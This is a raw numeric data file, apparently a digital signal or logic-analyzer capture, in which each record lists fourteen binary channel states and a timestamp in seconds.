1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4960908e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4960932e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4960960e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4960984e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4961012e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4961036e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4961060e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4961084e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4961108e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4961132e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4961164e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4961188e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4961220e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4961240e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4961264e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4961292e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4961316e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4961340e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4961364e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4961388e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4961412e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4961440e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4961464e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4961492e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4961516e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4961540e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4961564e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4961588e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4961612e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4961640e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4961664e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4961692e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4961716e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4961740e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4961764e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4961788e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4961812e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4961840e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4961864e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4961892e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4961916e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4961944e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4961972e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4961996e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4962020e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4962044e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4962068e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4962092e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4962120e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4962144e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4962172e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4962196e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4962220e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4962244e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4962268e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4962292e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4962320e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4962344e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4962372e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4962396e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4962420e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4962444e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4962468e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4962492e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4962520e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4962544e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4962572e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4962596e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4962620e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4962644e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4962668e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4962692e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4962720e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4962744e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4962772e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4962796e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4962820e-02 1,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4962844e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4962868e-02 1,0,0,1,1,0,0,0,0,0,0,0,0,1,3.5087692e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,3.5087860e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,3.5087884e-02 0,1,0,1,1,0,0,0,0,0,0,1,0,1,3.5087908e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,3.5087936e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,1,3.5088236e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,3.5088268e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,1,3.5088308e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,3.5088336e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,1,3.5088360e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,3.5088388e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,1,3.5088412e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,3.5088436e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,1,3.5088460e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,3.5088488e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5088524e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5088536e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5088560e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5088588e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5088612e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5088660e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5088688e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5088708e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5088736e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5088764e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5088788e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5088812e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5088836e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5088860e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5088888e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5088940e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5088964e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5088988e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5089012e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5089064e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5089088e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5089112e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5089140e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5089188e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5089212e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5089260e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5089288e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5089340e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5089364e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5089388e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5089412e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5089436e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5089460e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5089488e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5089512e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5089564e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5089588e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5089636e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5089660e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5089716e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5089740e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5089764e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5089788e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5089792e-02 0,1,0,1,1,1,0,0,0,1,0,0,1,0,3.5089836e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5089860e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5089868e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5089888e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5089912e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5089940e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5089964e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5089988e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5090012e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5090036e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5090060e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5090116e-02 0,1,0,1,1,0,0,0,0,1,0,0,0,0,3.5090140e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5090144e-02 0,1,0,1,1,1,0,0,0,1,0,0,1,0,3.5090164e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5090188e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5090196e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5090212e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5090236e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5090260e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5090288e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5090340e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5090364e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5090388e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5090412e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5090464e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5090488e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5090540e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5090564e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5090612e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5090636e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5090660e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5090688e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5090712e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5090740e-02 0,1,0,1,1,1,0,0,0,1,0,0,1,0,3.5090788e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5090812e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5090820e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5090836e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5090860e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5090916e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5090940e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5090988e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5091012e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5091064e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5091088e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5091112e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5091136e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5091164e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5091188e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5091212e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5091236e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5091288e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5091312e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5091316e-02 0,1,0,1,1,1,0,0,0,1,0,0,1,0,3.5091340e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5091364e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5091372e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5091388e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5091412e-02 0,1,0,1,1,0,0,0,0,1,0,0,0,0,3.5091416e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5091420e-02 0,1,0,1,1,1,0,0,0,1,0,0,1,0,3.5091464e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5091488e-02 0,1,0,1,1,1,0,0,0,0,0,0,0,0,3.5091492e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5091496e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5091516e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5091536e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5091564e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5091588e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5091636e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5091660e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5091688e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5091712e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5091764e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5091788e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5091836e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5091860e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5091916e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5091936e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5091964e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5091988e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5092012e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5092036e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5092060e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5092088e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5092112e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5092132e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5092164e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5092188e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5092212e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5092236e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5092260e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5092288e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5092312e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5092336e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5092364e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5092388e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5092412e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5092436e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5092460e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5092488e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5092512e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5092532e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5092564e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5092588e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5092612e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5092636e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5092660e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5092688e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5092712e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5092740e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5092764e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5092788e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5092812e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5092836e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5092860e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5092888e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5092912e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5092940e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5092964e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5092988e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5093012e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5093036e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5093060e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5093088e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5093112e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5093140e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5093164e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5093188e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5093212e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5093236e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5093260e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5093288e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5093312e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5093340e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5093364e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5093388e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5093412e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5093436e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5093460e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5093488e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5093512e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5093540e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5093564e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5093588e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5093612e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5093636e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5093660e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5093688e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5093712e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5093740e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5093764e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5093788e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5093812e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5093836e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5093860e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5093888e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5093912e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5093940e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5093964e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5093988e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5094012e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5094036e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5094060e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5094088e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5094112e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5094140e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5094164e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5094188e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5094212e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5094236e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5094260e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5094288e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5094312e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5094340e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5094364e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5094388e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5094412e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5094436e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5094460e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5094488e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5094512e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5094540e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5094564e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5094588e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5094612e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5094636e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5094660e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5094688e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5094712e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5094740e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5094764e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5094788e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5094812e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5094836e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5094860e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5094888e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5094912e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5094940e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5094964e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5094988e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5095012e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5095036e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5095060e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5095088e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5095112e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5095140e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5095164e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5095188e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5095212e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5095236e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5095260e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5095288e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,3.5219596e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,3.5219808e-02 1,1,0,1,1,0,0,0,0,0,0,1,0,1,3.5219824e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,3.5219852e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,1,3.5220148e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,1,3.5220172e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,1,3.5220220e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,1,3.5220244e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,3.5220252e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,1,3.5220268e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,3.5220296e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,1,3.5220320e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,3.5220348e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,1,3.5220372e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,3.5220396e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,1,3.5220400e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5220428e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.5220444e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5220468e-02 1,1,0,1,1,1,0,0,0,0,0,0,0,0,3.5220476e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5220480e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5220496e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5220520e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5220524e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.5220572e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5220596e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5220604e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5220620e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5220644e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5220668e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5220696e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5220720e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5220748e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5220772e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5220796e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5220800e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.5220844e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5220868e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5220876e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5220896e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5220920e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5220924e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.5220972e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5220996e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5221004e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,3.5221044e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,3.5221068e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5221076e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.5221096e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5221120e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.5221148e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,3.5221172e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,3.5221196e-02 